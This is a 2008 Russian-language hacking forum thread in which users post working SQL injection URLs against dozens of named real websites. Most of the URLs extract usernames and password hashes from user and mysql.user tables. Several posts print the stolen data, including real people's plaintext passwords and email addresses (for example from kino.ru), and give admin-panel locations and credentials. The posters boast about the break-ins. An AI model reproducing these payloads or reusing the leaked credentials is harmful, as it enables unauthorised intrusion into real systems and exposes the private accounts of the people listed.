http://www.bhv.ru/books/boa.php?id=-1))+and+((1=1 (адмиинка http://www.bhv.ru/admin/)
http://www.delphi.int.ru/download.php?id=-1)+union+select+concat_ws(0x3a,id,email,country,ci ty,website,icq,uname,password)+from+users/*
http://65-k.com/news.php?mode=show&id=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6/*
http://www.punk.org.ua/users/detail.php?id=999+union+select+1,2,3,4,5,6,7,8,con cat_ws(0x3a,id,email,login,password),10,11,12,13,1 4,15,16,17,18,19,20,21,22,23+from+users
http://www.lyapis.com/photo.php?cl=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),da tabase(),user())

fobofob

19.01.2008, 18:16

CMS I-cont

_________________________________

http://www.maybach-manufaktur.ru/news/?id=-9+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7, 8,9+from+maybach_users/*

http://www.emspost.ru/en/news/archive/?id=-498+union+select+1,2,3,4,concat(login,0x3a,pwd),6, 7,8,9+from+ems_users+limit+2,1/*

http://serpentor.ru/news/?id=-368+union+select+1,concat(login,0x3a,pwd),3,4,5,6, 7,8+from+serpentor_users+limit+1,1/*

http://trinity-cis.com/en/news/?id=-12+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7 ,8,9,10,11,12+from+trinity_users/*

http://www.marcor.ru/news/?id=-21+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7 ,8,9+from+marcor_users/*

http://www.relod.ru/news/?id=-109+union+select+1,2,3,4,concat(login,0x3a,pwd),6, 7,8,9,10,11+from+relod_users/*

http://www.itclinic.ru/press_center/news/?id=-2+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7, 8,9,10+from+itclinic_users/*

http://www.rochet.ru/news/?id=-379+union+select+1,2,3,4,concat(login,0x3a,pwd),6, 7,8,9+from+rochet_users/*

http://www.gluon.ru/news/?id=-375+union+select+1,2,3,4,concat(login,0x3a,pwd),6, 7,8,9+from+gluon_users/*

http://www.schnittke-mgim.ru/news/?id=-26+union+select+1,2,3,4,5,concat(login,0x3a,pwd),7 ,8,9,10+from+shnitke_users/*

http://www.eurotemp.ru/news/?id=-16+union+select+1,2,concat(login,0x3a,pwd),4,5+fro m+eurotemp_users/*

http://www.samaya-samaya.ru/company/news/?id=-22+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7 ,8,9,10,11+from+sam_users/*

http://www.mostd.ru/news/?id=-1+union+select+concat(login,0x3a,pwd),2,3,4,5+from +mostd_users/*

http://ikrs.ru/news/?id=-371+union+select+1,2,3,4,concat(login,0x3a,pwd),6, 7,8,9+from+ikrs_users/*

http://www.1tort.ru/news/?id=-366+union+select+1,2,3,4,5,concat(login,0x3a,pwd), 7,8,9,10+from+1tort_users/*

http://neftebor.ru/news/?id=-17+union+select+1,2,3,concat(login,0x3a,pwd),5,6,7 ,8,9+from+neftebor_users/*

http://www.harmline.ru/news/?id=-371+union+select+1,2,3,4,concat(login,0x3a,pwd),6, 7,8,9+from+harmony_users/*

http://www.eko-sad.ru/news/?id=-395+union+select+1,2,3,4,concat(login,0x3a,pwd),6, 7,8,9+from+ecosad_users/*

http://www.panoramakino.ru/news/?id=-374+union+select+1,2,3,4,concat(login,0x3a,pwd),6, 7,8,9+from+panorama_users/*

http://www.hotelpearl.ru/news/?id=-13+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7 ,8,9+from+hotelpearl_users/*

http://www.mp218.ru/articles/news/?id=-8+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7, 8,9+from+mp218_users/*

http://digitec.ru/news/?id=-8+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7, 8,9+from+digitec_users/*

http://www.japanplast.ru/news/?id=-7+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7, 8,9+from+japanplast_users/*

http://www.angic.ru/news/?id=-5+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7, 8,9+from+angic_users/*

http://dvector.ru/news/?id=-2+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7, 8,9,10+from+dvector_users/*

http://www.lucsor.ru/news/?id=-1+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7, 8,9+from+lucsor_users/*

http://www.nstkani.ru/news/?id=-1+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7, 8,9,10+from+nika_users/*

http://omnia-insurance.com/news/?id=-1+union+select+1,2,3,4,concat(login,0x3a,pwd),6,7, 8,9+from+omnia_users/*

http://www.leon-beton.ru/news/?id=1+union+select+1,2,3,4,concat(login,0x3a,pwd), 6,7,8,9+from+leon_users/*

http://www.zalogu.net/news/?id=1+union+select+1,2,3,4,concat(login,0x3a,pwd), 6,7,8,9+from+zalogu_users/*

http://www.adanilov.ru/news/?id=-1+union+select+1,2,3,4,5,6,concat(login,0x3a,pwd), 8,9,10,11+from+danilov_users/*

http://www.melodytour.ru/news/?id=1+union+select+1,2,3,4,concat(login,0x3a,pwd), 6,7,8,9+from+melody_users/*

http://www.abarysheva.ru/news/?id=1+union+select+1,2,3,4,concat(login,0x3a,pwd), 6,7,8,9+from+barysheva_users/*

http://www.torshin.ru/news/?id=1+union+select+1,2,3,4,concat(login,0x3a,pwd), 6,7,8,9+from+torshin_users/*

_________________________________

виновник этого безобразия :D :

http://www.i-market.ru/news/?id=-434+union+select+1,2,3,4,5,concat(login,0x3a,pwd), 7,8,9,10+from+imarket_users/*

_________________________________

админки находятся по адресу

http://site.ru/adm

хеш паролей простой md5

_________________________________

p.s взломано при помощи телефона nokia N70,браузера Opera-mini(mod) и... не совсем кривых рук :)

fobofob

19.01.2008, 19:59

4.0.27-log
-----------------------------------------------------

4.0.27-log
-----------------------------------------------------

4.0.17-nt
-----------------------------------------------------

5.0.24-community-nt
http://www.isobelcampbell.com/phpbb2/
13к узеров
admin:hamilton
-----------------------------------------------------

я конечно понимаю что офиц сайт битлз - это кощунство - но всётаки ..
но вывода добиться не удалось (( можт комуто повезёт больше ))

http://www.beatles.com/hub/article.php?page=-yeloSub'+union+select+1,2,version(),4/*&menuItem=the%20films

5 мускул,а дальше сам копай ;)

ElteRUS

19.01.2008, 21:12

http://nipponm.ru/carcard.html?id=-1+union+select+1,2,3,concat_ws(0x2F,version(),data base(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19/*

4.1.22-log/nipponm9_base/nipponm9_nipponm@localhost
-----------------------------------------------------------------------------

http://www.brgu.ru/index.php?openpage=readnews.php&id=-1+union+select+1,2,concat_ws(0x2F,version(),databa se(),user()),4,5,6,7/*

4.1.20/bgu/admin@localhost

http://www.brgu.ru/index.php?openpage=readnews.php&id=-1+union+select+1,2,concat_ws(0x2F,email,password), 4,5,6,7+from+users+limit+0,1/*

мейл/пароль
admin@brgu.ru/rbkkth100979

159932

20.01.2008, 04:25

Прикольный вывод инфы - нада вбить адресс после перехода - в след. адресе будет инфа
я пока первый раз с таким встретился ))
http://www.newdesign.ru/?pageId=-14+union+select+1,2,3,4,5,6,7,8,version(),0,1,2,3, 4,5,6,7,8,9,0,1/*
5.0.44-log
таблы
Sites
Prop
Extensions
Content
Companys
-----------------------------------------------------
http://www.mirtour.ru/order_prop.php?id=-191+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6/*
5.0.45-log
ничо путного не достал
только в табле passwds есть password - 12345 - но от чего он не понять ((

.Begemot.

20.01.2008, 16:51

PostgreSQL
bpla.org
http://www.bpla.org/index.php?go=events&evid=-1180052984+union+select+null,null,null,null,null,V ERSION(),null,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null,null,n ull,null,null,null,null/**/&patlaw=efd8e696b67304cc30bb596be7c38061
Version() - PostgreSQL 7.2.1 on i686-pc-linux-gnu, compiled by GCC 2.96
http://www.bpla.org/index.php?go=events&evid=-1180052984+union+select+null,null,null,null,null,U SER,null,null,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null,null,null,n ull,null,null,null/**/&patlaw=efd8e696b67304cc30bb596be7c38061
USER - bpla
zz-soft.com.pl
http://www.zz-soft.com.pl/kolo/index.php?action=1&idkat=-21+union+select+0,concat(USER(),0x3a,DATABASE(),0x 3a,VERSION()),2/*
USER:zdrojek_kolo@localhost
VERSION:4.1.22-standard-log
DATABASE:zdrojek_kolo

m0use

21.01.2008, 02:27

Любителям футбола посвящяется
_http://fctavriya.org.ua/cgi-bin/news-details.cgi?newsid=-469+union+select+1,2,log in,4,pas,6,7+from+users+where+id=1/*

WuWu

21.01.2008, 20:03

http://www.ziaruldebacau.ro/index.php?rubrica=9+union+select+1,2,concat_ws(0x3 a,version(),user(),database()),4,5,6,7,8,9/*

4.1.22-standard-log
ziarul_iulian@localhost
ziarul_dbziar

http://www.superlink.ro/index.php?id=-9999+union+select+1,2,3,4,concat_ws(0x3a,database( ),version(),user()),6,7,8,9,10,11,12,13,14/*

4.1.20-max-log
felici1_slink@76.162.254.212
felici1_slink

http://www.pnl.ro/index.php?id=pers&user=99999+union+select+concat_ws(0x3a,user(),data base(),version()),2,3,4,5,6,7,8,9,10,11,12,13,14,1 5/*
4.1.20
web@localhost
Project_K

ViniK

21.01.2008, 21:01

http://www.paintball.ru/next.php?id=99999+union+select+0,1,concat_ws(0x3a, version(),user(),database())/*
Я нешарю пока нихера но потихой начинаю понимать.... :D

WuWu

22.01.2008, 00:42

http://job.pl.ua/search.php?searchtype=browse&whatlooking=vacancies&category=9999+union+select+1,2,username,userpass+f rom+poll_user/*
5.0.45-community-log
jobplu_admin@localhost
jobplu_base

admin/6512bd43d9caa6e02c990b0a82652dca
http://www.theoneminutesjr.org/index.php?thisarticle=-9999+union+Select+1,2,3,4,concat_ws(0x3a,version() ,user(),database()),6,7,8,9,10,11,12,13,14,15/*
4.1.22-log
root@localhost
mmmcms
Martin/zYjNDfJ0HwyS хеш походу, я несмог с ним справиться... как пасворд он не подходит
админка: /admin
http://www.degrotegriepmeting.nl/public/index.php?thisarticle=999+union+select+1,2,3,4,con cat_ws(0x3a,database(),user(),version()),6,7,8,9,1 0,11,12,13,14/*
5.0.30-Debian_0.dotdeb.1-log
griepmeting@mysql01.cambrium.nl
griepmeting
http://www.park.nl/park_cms/public/index.php?thisarticle=9999+union+select+1,2,3,4,co ncat_ws(0x3a,version(),user(),database()),6,7,8,9, 10,11,12,13,14,15/*

4.0.13-log
root@localhost
park_cms

Joker-jar

22.01.2008, 18:42

http://www.mycaraudio.ru/newsdesk_info.php/newsdesk_id/58'%20and%20lower(substring(version(),1,1))='5

fRg

23.01.2008, 13:10

adage.comhttp://adage.com/garfieldtheblog/post?article_id=-1+union+select+1,aes_decrypt(aes_encrypt(concat_ws (0x3a,version(),database(),user()),0x71),0x71),3,4 ,5,6,7,8,9,10/* 4.1.15-emic-2.7.1-121-log:adage:adage@localhost

mysql.user:http://adage.com/garfieldtheblog/post?article_id=-1+union+select+1,2,aes_decrypt(aes_encrypt(concat_ ws(0x3a,user,password),0x71),0x71),4,5,6,7,8,9,10+ from+mysql.user+limit+4,1/*
юзвери:adageUser:5055955979f4e1e0
adage:*B26CE55D7330CED56ACCD1CFA9D8A18344CDC32F
root:*279E41BB816D40095DDA8AE1DDC59D42368BF351
trey:*427043D0F35CC5CFD50953AE7679EC4F0D458B99
circ:*FFDFE4D7155A660913C5CCB6AB6C20CA0C399AB8

it's my

23.01.2008, 15:30

http://www.hetelfde.nl/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM +jos_users/*
http://www.touring-england.com/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM +jos_users/*
http://www.greeknaturism.com/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM +jos_users/*
http://4web.ws/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM +jos_users/*
http://www.contra.lv/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM +jos_users/*
http://pdvguate.org/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM +jos_users/*
http://test.freedom-ru.net/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM +jos_users/*
http://degjomuzike.com/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM +jos_users/*
http://jco.in/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM +jos_users/*
http://www.animeaz.com/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM +jos_users/*
http://www.alternov.ru/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM +jos_users/*
http://modeshape.in/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM +jos_users/*
http://justchum.com/game/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM +jos_users/*
http://zoorb.ru/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM +jos_users/*
http://elmicom.com/zabava/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM +jos_users/*
http://myniteclub.com.au/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM +jos_users/*
http://lars.lischer.name/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM +jos_users/*
http://www.dijaki.info/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM +jos_users/*
http://www.bljesak.info/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM +jos_users/*
http://educatic.info/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM +jos_users/*
http://vanb.biz/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM +jos_users/*
http://darknight.biz/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM +jos_users/*

ХаЬа

23.01.2008, 16:02

http://www.tredu.net/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM +jos_users/*
http://www.fiestaintunisia.com/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM +jos_users/*
http://www.mojsalon.net/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM +jos_users/*
http://www.el-edu.com/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM +jos_users/*

db_reader

23.01.2008, 16:10

Привет.
Я новенький, решил зарегистрироваться :).
Вот нашол скулю:

www.southworth.com

http://www.southworth.com/page.php?id=-152+union+select+concat_ws(0x3A3a,password,usernam e,id)+from+users+limit+0,1/*

_http://www.southworth.com/catalog/admin/

^^^Там админку вроде нашёл, но мэйл для входа вывести не могу .

Версия 4.1.20

it's my

23.01.2008, 19:04

http://steve-o-meter.com/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM +jos_users/*
http://www.freegaming.de/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM +jos_users/*
http://www.bljesak.info/index.php?option=com_puarcade&Itemid=99999&fid=-1+UNION+SELECT+concat(username,0x3a,password)+FROM +jos_users/*

-=lebed=-

23.01.2008, 20:05

www.gnn.tv может и боян - не проверял...

_http://www.gnn.tv/articles/article.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat(version (),0x3a,user(),0x3a,database()),12,13,14,15,16,17, 18,19,20,21,22,23/*

frigid20

23.01.2008, 21:11

http://www.stchristopherclub.com/sub/pics.php?id=-1+union+select+1,concat(user,0x3a,password),3,4+fr om+mysql.user/*
root:1af55af32fcea9dc : 222111

http://www.agir.ro/articol.php?id_articol=-1+union+select+1,2,concat_ws(0x3a,username,passwor d),4,5,6,7,8,9,10+from+agirro_forum.agir_users+lim it+10,1/*
Gabriela:6f0f8609a2d424426fd0040d9ebff04e4c186b45

http://www.uvacres.org/faculty_page.php?id=1+union+select+1,2,3,4,5,6,use r,password,9,10,11,12,13+from+users/*

fobofob

23.01.2008, 23:15

Оператор связи cmda-стандарта в Узбекистане
5 мускул,вывод все сразу ;)

http://www.cdma.uz/index.php?action=news&news_id=-608+union+select+1,concat(table_schema,0x3a,table_ name,0x3a,column_name),3,4,5,6,7,8,9,10,11,12,13,1 4,15+from+information_schema.columns/*

админко:

http://www.cdma.uz/admin/admin

159932

23.01.2008, 23:20

www.gamesprut.ru
http://www.gamesprut.ru/news/?fln=-13+union+select+1,2,3,convert(concat(username,0x3a ,password),binary),5+from+cht_reg_users+limit+0,1/*
http://www.gamesprut.ru/frm/
SteelBear:d9b798fe05e2c739497125afe8bcdf79
Барс:318388c5ff8b380662b1d076971998f2
Hotel-15:8cca069025b8d1f4b96ac805dbc0eaa3:21071975
http://www.gamesprut.ru/phpmyadmin/
пасса от этого не нащёл

db_reader

24.01.2008, 02:39

www.healthyskepticism.org

PR5 тИЦ -30 (что это ? :))

http://www.healthyskepticism.org/news/issue.php?id=-15+union+select+1,2,concat_ws(0x3A3a,name,password ),4,5,6,7+from+admin/*

Peter Mansfield::1a45d46f063cb5fd

Joker-jar

24.01.2008, 11:06

http://comp-neat.ru/index2.php?GoAndRun=catalog&ID=-1+union+select+1,2,3,4,char(0xea,0xf3,0xf1,0xee,0x ea,0x20,0xe4,0xe5,0xf0,0xfc,0xec,0xe0),2,7/*

-=lebed=-

24.01.2008, 11:14

9to5.org

_http://www.9to5.org/action/index.php?story=-1+union+select+1,concat(version(),0x3a,user(),0x3a ,database()),3,4,5,6,7,8,9,10/*
4.1.21-community-nt:toorg1@69.24.64.105:toorg1

www.orionbag.com

_http://www.orionbag.com/index.php?story=-1+union+select+1,concat(version(),0x3a,user(),0x3a ,database

()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27/*

5.0.24A-STANDARD-LOG:ONIONBAG@NECCO.DREAMHOST.COM:ONIONBAG
47 Таблиц:

CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
COPA_CHART
COPA_TEAMS
FFA_AP
FFA_ASARC
FFA_ASCORE
FFA_BLOG
FFA_LA
FFA_LEAGUE
FFA_PLAYER
FFA_PSARC
FFA_SCORE
FFA_SEASON1
MAILLIST
ORB_IMAGE
ORB_ISSUE
ORB_POST
ORB_STORY
T_BLOG
T_IMAGE
T_ISSUE
T_LINKS
T_LINKSRANK
T_LINKSRATE
T_POST
T_STORY
T_USER - интересная таблица, поля USERID,USERNAME,SP3SHUL,PROFILE,ACTIVATED,EMAIL,
MODIFIED,CREATED,TYPE,NAMECHECK,MAILLIST

T_USERCOPY
WC_CHART
WC_GTOTALS
WC_TEAMS
WC_VENUE

Смотрим поля таблицы t_user

_http://www.orionbag.com/index.php?story=-1+union+select+1,column_name,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+fro m+INFORMATION_SCHEMA.COLUMNS+where+table_name=char (116,95,117,115,101,114)+limit+1,1/*

Смотрим записи таблицы t_user

_http://www.orionbag.com/index.php?story=-1+union+select+1,concat(USERID,0x3a,USERNAME,0x3a, SP3SHUL,0x3a,PROFILE,0x3a,ACTIVATED,0x3a,EMAIL,0x3 a,MODIFIED,0x3a,CREATED,0x3a,TYPE,0x3a,NAMECHECK,0 x3a,MAILLIST),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27+from+t_user+limit+ 0,1/*
Юзер походу один... :mad:

fRg

24.01.2008, 13:23

RockForLife.orghttp://www.rockforlife.org/action_tellyourprolifestory.php?storyID=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5,6,7,8/* 5.0.45-log:all_onlinebase:aurora@cgi0701.int.bizland.net

Таба login:http://www.rockforlife.org/action_tellyourprolifestory.php?storyID=-1+union+select+1,aes_decrypt(aes_encrypt(concat_ws (0x3a,user,pass,email),0x71),0x71),3,4,5,6,7,8+fro m+login+limit+0,1/* Интересные поля:user,pass,email
Данные:jmanak:0OKg1sSc:jmanak@all.org
jbrown:0dbW1NDc19vO:jbrown@all.org
dbrandao:l6Scp8vc0eY=:dbrandao@all.org
ewhittington:yuDd2sbZm5+a:Erik@RockForLife.org
peddy:2dLc5g==:Phil@RockForLife.org
blogger:2dLc5g==:jason@digitalstarfire.com
jcatelli:xtvTpJOgmA==:jcatelli@all.org
mhahnenberg:y9bX083Iyd/O:mhahnenberg@all.org
Patrick:3NLV4dfMx9ia:wgott@verizon.net
owmamahateful:0s7No5KalQ==:hatefulproductions@hotm ail.com
marysunshine:y87d287I:marysun@catholic.org
RFLCCCD:t9zM3ZWz3tPO:jlcrp@catholicweb.com
RFL Ventura County:y9zb3Mba2uA=:rockforlife87@msn.com
RFL Fayetteville:lZ+fosLVyaGb:rockforlifefay@yahoo.com
nflusche:1c7c5ZKZmKE=:nflusche@all.org
acatelli:xtvTpJOgmA==:acatelli@all.org
tbrock:lp+cptHI2OA=:tbrock@all.org
pbrown:lp+cptHI2OA=:pbrown@all.org
scarroll:lp+cptHI2OA=:scarroll@all.org
kchenault:lp+cptHI2OA=:kchenault@all.org
sclark:lp+cptHI2OA=:sclark@all.org
jcournia:lp+cptHI2OA=:jcournia@all.org
acrane:1c7c5ZKZmKE=:acrane@all.org
fdaub:lp+cptHI2OA=:fdaub@all.org
pdaub:1c7c5ZKZmKE=:pdaub@all.org
aflusche:lp+cptHI2OA=:aflusche@all.org
mhichborn:1c7c5ZKZmKE=:mhichborn@all.org
shopping:0dbd5s3M:shopping@all.org
bhorn:1c7c5ZKZmKE=:bhorn@all.org
rjohnston:lp+cptHI2OA=:rjohnston@all.org
skenney:xt7e28/I2A==:skenney@all.org
lrehman:lp+cptHI2OA=:lrehman@all.org
jsedlak:1c7c5ZKZmKE=:jsedlak@all.org
msedlak:lp+cptHI2OA=:msedlak@all.org
bseers:1c7c5ZKZmKE=:bseers@all.org
dcurrier:ltrY5MbJxs/i:dcurrier@all.org
ltignor:ydfdo5OZmg==:ltignor@all.org
pnowak:lp+cptHI2OA=:pnowak@all.orgЭтот сайт - часть от проекта _http://www.all.org (что видно по большинству ящиков!) ,
на котором тоже есть баги... Кто знает, может они крутятся на одном серваке...

fRg

24.01.2008, 14:14

linux.uta.eduhttp://linux.uta.edu/article.php?pid=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5/* 5.0.22-log:linux:linux@web-4.uta.edu

scaraye.comhttp://www.scaraye.com/article.php?rub=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user())/*&sr=49 4.0.16-standard:my37767:my37767@62.193.203.48

macmerc.comhttp://www.macmerc.com/article.php?sid=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6,7,8,9,10,11,12/* 4.1.20-log:macmerc_nuke:macmerc@209.68.1.202

inthefray.comhttp://www.inthefray.com/html/article.php?sid=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6,7,8,9/* 5.0.24a-standard-log:mpn_itfmag:itfmag@zim.dreamhost.com

В табе mpn_users есть такие поля как:name,uname,pass,email,femail,emailpass,user _icq,user_aim,user_yim,user_msnm

WuWu

24.01.2008, 16:22

http://www.smithhomework.us/article.php?sid=999+union+select+1,2,concat_ws(0x3 a,database(),user(),version()),4,5,6,7,8/*

4.0.27-standard
jsmith_peanut@localhost
jsmith_website

http://www.prophecies.us/article.php?sid=9999+union+select+1,2,concat_ws(0x 3a,database(),user(),version()),4,5,6,7,8/*

4.1.22-max-log
prophet_site@p3slh097.shr.phx3.secureserver.net
prophet_site

nex0

24.01.2008, 18:08

kino.ru
http://kino.ru/cinema.php?id=999+union+select+1,2,3,4,5,6,7/*

version() 4.1.22-standard-log ну и срать))
user() u6635_1@localhost
database() u6635_1

users
~950-100 в базе
http://kino.ru/cinema.php?id=999+union+select+1,2,3,concat(id,%22 :%22,login,%22:%22,psswd,%22:%22,email),5,6,7+from +users+limit+0,1000/*
часть из них...
вид id:login:psswd:email
1:Rattlemouse:purpur:rattlemouse@gmail.com
2:smoker:7924439:sm@kino.ru
3:nvo:angel:nvo0805@yandex.ru
4:xxx:xxx:xxx@xxx.ru
5:natasha:12345:nvo@kino.ru
6:tarkovsky:1234567:1234567
93:time23:230790:nataxa90paw@mail.ru
9:igor:140766:igormikh@rol.ru
10:elvis:4082506:elvis_n@mail.ru
12:stas:130281:forec@yandex.ru
66:strippedhyena:reptile:strippedhyena@mail.ru
13:Ocsana:310373:ocsana@meden.ru
14:kirr:777444:kirkot@yandex.ru
15:Nat:111222:nat@kino.ru
16:Yuliko:ju17011977:oper@metcombank-moscow.ru
17:Demetr:809809:webspider@list.ru
18:groza:250276:nakostina@yandex.ru
19:Belka:555444:finwar@narod.ru
20:TaN4eS:987654:npocmo@inbox.ru
21:Destiny:03090309:destiny-375@yandex.ru
22:horek:453453:polecat@inbox.ru
23:Crazy:250674:m.osipov@it911.ru
24:Kseka:675675:ksekovka@yandex.ru
25:Oksana:999888:oksanastr@yandex.ru
26:Legenda:tatkasparco:legenda@bk.ru
27:CoolBoy:989898:super@mail2k.ru
28:PODvodnik:magistr:vladis@latnet.lv
29:Andrey:897897:am@4a.ru
30:Stelfort:89265834267:setstelfortshow@mail.ru
31:Fedot:fedot128:galakafedor@mail.ru
32:Reaccia:787878:h_happy@mail.ru
34:Misha:543543:mikhail@sutupov.ru
36:Iren:324324:BLA_BLA_BLA@inbox.ru
37:Surik:kirus:surik@renew.ru
38:LUMER:67890:tit-lesha@mail.ru
39:marusenka:234543:blinovnikvy@awax.ru
42:Tjema:111222:vovikovich@yandex.ru

xss
http://kino.ru/cinema.php?id=999+union+select+1,"<script>alert()</script>",3,4,5,6,7+from+users+limit+0,1000/*

админка
http://kino.ru/admin
smoker
7924439
сайты на этом сервере (2ip.ru/server)
www.freeware.ru
www.elephant.ru
www.kino.ru
www.winceware.ru
www.macware.ru
www.unixware.ru
www.palmware.ru
www.download.ware.ru
www.sail.ru
www.old.freeware.ru
www.ware.ru
www.priceware.ru
www.journey.ru
www.inter.su
www.hospital.ru
www.bakalova.ru
www.debil.ru
шелл не лил

passionfordancing.co.uk
http://www.passionfordancing.co.uk/country.php?rID=100+union+select+1,2,3,4,5,6
version() 5.0.54
user() passionforda@localhost
database() passionforda
http://www.passionfordancing.co.uk/country.php?rID=100+union+select+1,2,concat(admini d,char(58),password),4,5,6+from+tbladmin+limit+0,1 00--
админка
www.passionfordancing.co.uk/admin
allan@ddswebdesign.co.uk:ki11kenny1970

ни в первом, ни во втором случае доступа к mysql.user не получил=//

159932

24.01.2008, 22:16

www.perfectummobile.com
http://www.perfectummobile.com/index.php?action=news&news_id=-613+union+select+1,concat_ws(0x3a,username,passwor d),3,4,5,6,7,8,9,0,1+from+bsmc.bcms_admins+limit+0 ,1/*
------------------------------------------------------
http://www.perfectummobile.com/index.php?action=news&news_id=-613+union+select+1,concat_ws(0x3a,login,passw),3,4 ,5,6,7,8,9,0,1+from+cms_admins/*
------------------------------------------------------
http://www.perfectummobile.com/index.php?action=news&news_id=-613+union+select+1,concat(user,0x3a,password,0x3a, host),3,4,5,6,7,8,9,0,1+from+mysql.user/*
5.0.26-standard
admin:9af41a03da452b8c2549aff071ed22fe:sayqal
но пасс не катит
cdmadmin:9622f76499e8588addb05838587a8e8f - возможно этот подойдёт - но не расщифровал

http://www.perfectummobile.com/admin/admin
http://www.perfectummobile.com/admin/phpinfo.php
http://www.perfectummobile.com/admin/smarty

Tigger

25.01.2008, 02:46

www.games.zbeng.net
http://games.zbeng.net/game.php?id=-8+union+select+concat(username,char(58),password), 2,3,4+from+users+limit+1,10/*
Вывод в тайтле
http://zbeng.net/admin.php- админка
Жаль, что в админке все через ****...(глупый язык=)))
-----------------------------------------------------------------------
www.pfl.com.ua
http://www.pfl.com.ua/game.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27/*
Нашел таблу adm
В табле adm колонка name

fobofob

25.01.2008, 02:57

www.perfectummobile.com

5.0.26-standard

на предыдущей странице этот сайт я выкладывал, cmda.uz ,походу это зеркала :)

A2GIL

25.01.2008, 03:33

Парочка бразильских ресурсов:

http://www.visitadopapa.org.br/pagina.php?id=48+and+1=2+union+all+select+1,concat (user,char(58),password,char(58)),3+from+mysql.use r/*

http://www.visitadopapa.org.br/admin/ (no comments)
root: farofa

http://www.midiasemmascara.com.br/editoria.php?id=8+and+1=2+union+select+concat_ws(0 x3A,usuario,login,permissao),2+from+db_admusers/*
где поля:

usuario - логин
login - пароль

http://www.revistainovacao.uniemp.br/materia.php?id=83+and+1=2+union+select+1,2,3,4,5,6 ,concat_ws(0x3A,nome,login,senha,ativo),8,9,10,11, 12,13,14,15,16,17,18+from+usuario/*

